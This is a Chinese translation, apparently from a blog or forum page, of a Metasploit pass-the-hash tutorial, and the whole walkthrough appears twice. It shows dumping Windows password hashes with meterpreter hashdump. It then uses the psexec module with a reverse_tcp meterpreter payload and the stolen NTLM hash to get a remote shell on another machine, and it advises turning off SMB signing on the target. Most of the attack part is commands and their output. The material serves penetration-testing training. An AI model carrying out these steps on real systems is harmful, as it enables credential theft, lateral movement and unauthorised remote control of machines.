原文:http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
psexec被渗透测试者用来获得一个已知口令的系统访问权。作为一个渗透测试者,当我们通过漏洞成功获取一个系统访问权后,使用meterpreter来获得密码,或者通过fgdump, pwdump, cachedump和彩虹表来配合破解这些hash值。
我们也可以通过例如iam.exe这种工具来pass the hask。metasploit 中的psexec允许你输入密码,或hash值而不需要通过破解来获得访问权。首先我们拿下来一个系统的管理员密码,我们不需要破解它因为psexec允许我们使用hash值,来访问同一个域中的相同管理员帐户,从而在不同的系统中切换时不用担心破解密码。[b][color=blue]需要注意的一点是如果只含有NTLM(例如是一个15位的密码或通过GPO他们明确只应答NTLM),只用把****NOPASSWORD****替换为32个0,例如:[/color][/b]
[color=red]******NOPASSWORD*******:8846f7eaee8fb117ad06bdd830b7586c[/color]
替换为:
[color=red]00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c[/color]
在实验室中,可能会遇到下面的情况,即使使用正确的口令:
[color=red]STATUS_ACCESS_DENIED (Command=117 WordCount=0)[/color]
可以通过把目标机中注册表[color=blue][b]HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters[/b][/color]的[color=blue][b]RequireSecuritySignature[/b][/color]设为[color=blue][b]0[/b][/color]来修复。
[*] Meterpreter session 1 opened (192.168.57.139:443 -> 192.168.57.131:1042)
[b][color=blue]meterpreter > run post/windows/gather/hashdump[/color][/b]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
[color=red]Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::[/color]
meterpreter >
现在我们有了meterpreter 控制台和dump出的hash,让我们使用psexec和dump出的hash值来连接到另一台机器
[color=blue][b]root@kali:~# msfconsole[/b][/color]
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
=[ svn r14551 updated yesterday (2012.01.14)
[color=blue][b]msf > search psexec[/b][/color]
Exploits
========
Name Description
---- -----------
windows/smb/psexec Microsoft Windows Authenticated User Code Execution
windows/smb/smb_relay Microsoft Windows SMB Relay Code Execution
[b][color=blue]msf > use exploit/windows/smb/psexec[/color][/b]
[color=blue][b]msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp[/b][/color]
payload => windows/meterpreter/reverse_tcp
[b][color=blue]msf exploit(psexec) > set LHOST 192.168.57.133[/color][/b]
LHOST => 192.168.57.133
[b][color=blue]msf exploit(psexec) > set LPORT 443[/color][/b]
LPORT => 443
[b][color=blue]msf exploit(psexec) > set RHOST 192.168.57.131[/color][/b]
RHOST => 192.168.57.131
[color=blue][b]msf exploit(psexec) > show options[/b][/color]
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.57.131 yes The target address
RPORT 445 yes Set the SMB service port
SMBPass no The password for the specified username
SMBUser Administrator yes The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST 192.168.57.133 yes The local address
LPORT 443 yes The local port
Exploit target:
Id Name
-- ----
0 Automatic
[color=blue][b]msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c[/b][/color]
SMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
[color=blue][b]msf exploit(psexec) > exploit[/b][/color]
[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'Administrator'...
[*] Uploading payload...
[*] Created \KoVCxCjx.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.57.131[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.57.131[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (XKqtKinn - "MSSeYtOQydnRPWl")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \KoVCxCjx.exe...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.57.133:443 -> 192.168.57.131:1045)
meterpreter > shell
Process 3680 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
[color=red]C:\WINDOWS\system32>[/color]
psexec被渗透测试者用来获得一个已知口令的系统访问权。作为一个渗透测试者,当我们通过漏洞成功获取一个系统访问权后,使用meterpreter来获得密码,或者通过fgdump, pwdump, cachedump和彩虹表来配合破解这些hash值。
我们也可以通过例如iam.exe这种工具来pass the hask。metasploit 中的psexec允许你输入密码,或hash值而不需要通过破解来获得访问权。首先我们拿下来一个系统的管理员密码,我们不需要破解它因为psexec允许我们使用hash值,来访问同一个域中的相同管理员帐户,从而在不同的系统中切换时不用担心破解密码。[b][color=blue]需要注意的一点是如果只含有NTLM(例如是一个15位的密码或通过GPO他们明确只应答NTLM),只用把****NOPASSWORD****替换为32个0,例如:[/color][/b]
[color=red]******NOPASSWORD*******:8846f7eaee8fb117ad06bdd830b7586c[/color]
替换为:
[color=red]00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c[/color]
在实验室中,可能会遇到下面的情况,即使使用正确的口令:
[color=red]STATUS_ACCESS_DENIED (Command=117 WordCount=0)[/color]
可以通过把目标机中注册表[color=blue][b]HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters[/b][/color]的[color=blue][b]RequireSecuritySignature[/b][/color]设为[color=blue][b]0[/b][/color]来修复。
[*] Meterpreter session 1 opened (192.168.57.139:443 -> 192.168.57.131:1042)
[b][color=blue]meterpreter > run post/windows/gather/hashdump[/color][/b]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
[color=red]Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::[/color]
meterpreter >
现在我们有了meterpreter 控制台和dump出的hash,让我们使用psexec和dump出的hash值来连接到另一台机器
[color=blue][b]root@kali:~# msfconsole[/b][/color]
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
=[ svn r14551 updated yesterday (2012.01.14)
[color=blue][b]msf > search psexec[/b][/color]
Exploits
========
Name Description
---- -----------
windows/smb/psexec Microsoft Windows Authenticated User Code Execution
windows/smb/smb_relay Microsoft Windows SMB Relay Code Execution
[b][color=blue]msf > use exploit/windows/smb/psexec[/color][/b]
[color=blue][b]msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp[/b][/color]
payload => windows/meterpreter/reverse_tcp
[b][color=blue]msf exploit(psexec) > set LHOST 192.168.57.133[/color][/b]
LHOST => 192.168.57.133
[b][color=blue]msf exploit(psexec) > set LPORT 443[/color][/b]
LPORT => 443
[b][color=blue]msf exploit(psexec) > set RHOST 192.168.57.131[/color][/b]
RHOST => 192.168.57.131
[color=blue][b]msf exploit(psexec) > show options[/b][/color]
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.57.131 yes The target address
RPORT 445 yes Set the SMB service port
SMBPass no The password for the specified username
SMBUser Administrator yes The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST 192.168.57.133 yes The local address
LPORT 443 yes The local port
Exploit target:
Id Name
-- ----
0 Automatic
[color=blue][b]msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c[/b][/color]
SMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
[color=blue][b]msf exploit(psexec) > exploit[/b][/color]
[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'Administrator'...
[*] Uploading payload...
[*] Created \KoVCxCjx.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.57.131[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.57.131[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (XKqtKinn - "MSSeYtOQydnRPWl")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \KoVCxCjx.exe...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.57.133:443 -> 192.168.57.131:1045)
meterpreter > shell
Process 3680 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
[color=red]C:\WINDOWS\system32>[/color]
扫一扫
535
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
